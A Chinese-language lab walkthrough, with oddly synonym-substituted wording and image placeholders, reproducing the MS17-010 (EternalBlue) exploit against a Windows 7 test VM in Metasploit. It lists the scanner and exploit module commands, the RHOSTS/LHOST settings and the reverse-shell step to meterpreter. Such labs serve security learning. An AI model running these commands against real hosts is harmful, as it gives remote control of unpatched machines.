环境预备

方针:192.168.164.129(win7)
缝隙:MS17-010(永久之蓝)
目的:拿到最高权限,进行远程代码执行

一、确定方针及缝隙

1、msfconsole进入MSF形式,再测验能不能ping通方针主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测验一下缝隙是否存在。

[永恒之蓝]实战-漏洞复现

[永恒之蓝]实战-漏洞复现

二、查找验证模块并且调用

1、运用#search MS17-010指令,搜索查找MS17-010缝隙模块,如图:

[永恒之蓝]实战-漏洞复现

2、这儿咱们先挑选#1的auxiliary(辅佐模块)先进行踩点,检查缝隙是否能够运用,再去进行浸透进犯。

#use auxiliary/scanner/smb/smb_ms17_010

[永恒之蓝]实战-漏洞复现

3、运用#show options 指令,检查需求设置的选项(Required为yes是有必要设置的选项)。
[永恒之蓝]实战-漏洞复现

4、设置方针地址,设置方针端口;

set RHOSTS 192.168.164.129
set RPORT 445 

[永恒之蓝]实战-漏洞复现

5、最终运用#run或许exploit指令去运转检查缝隙是否存在
[永恒之蓝]实战-漏洞复现

6、Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010缝隙,能够去运用。 检测到该方针操作系统Windows 7 专业版 接下来咱们能够运用exploits模块进行浸透进犯。
有+号就能够进犯,能够进行IP规模扫描

三、运用exploist模块进行浸透

1、第二过程的时分检测到方针存在该缝隙,现在咱们开始进行浸透。 先运用#back指令退出辅佐模块,如图:

[永恒之蓝]实战-漏洞复现

2、运用#search MS17-010指令,搜索MS17-010模块,如图:
[永恒之蓝]实战-漏洞复现

3、咱们在第二步的时分运用的是auxiliary模块进行的缝隙检测,这回咱们运用exploit模块进行缝隙运用。这儿咱们挑选#2

use exploit/windows/smb/ms17_010_eternalblue

[永恒之蓝]实战-漏洞复现

4、运用#show options指令,检查需求设置的参数,如图:
[永恒之蓝]实战-漏洞复现

5、这儿咱们看见多出一个payload选项
[永恒之蓝]实战-漏洞复现

[永恒之蓝]实战-漏洞复现

6、这个选项的用处主要是浸透进犯成功后方针机与LHOST树立的Shell衔接,所以LHOST参数设置咱们自己本地的IP地址,RHOSTS参数仍是方针IP

#set RHOSTS 192.168.164.129
#set LHOST 192.168.164.128  

[永恒之蓝]实战-漏洞复现

payloads设置

7、最终运用#run指令去运转exploit

[永恒之蓝]实战-漏洞复现

8、显现meterpreter,咱们现已所浸透成功了,现在咱们现已拿到方针机的Shell了。 咱们能够运用#shell指令,在方针机翻开一个shell。
[永恒之蓝]实战-漏洞复现

9、输入shell,就能够进入方针靶机的shell指令界面;(出来是乱码:输入chcp 65001 这是utf8编码)
[永恒之蓝]实战-漏洞复现

更多共享微信搜索“安全info”公众号

本文运用 文章同步帮手 同步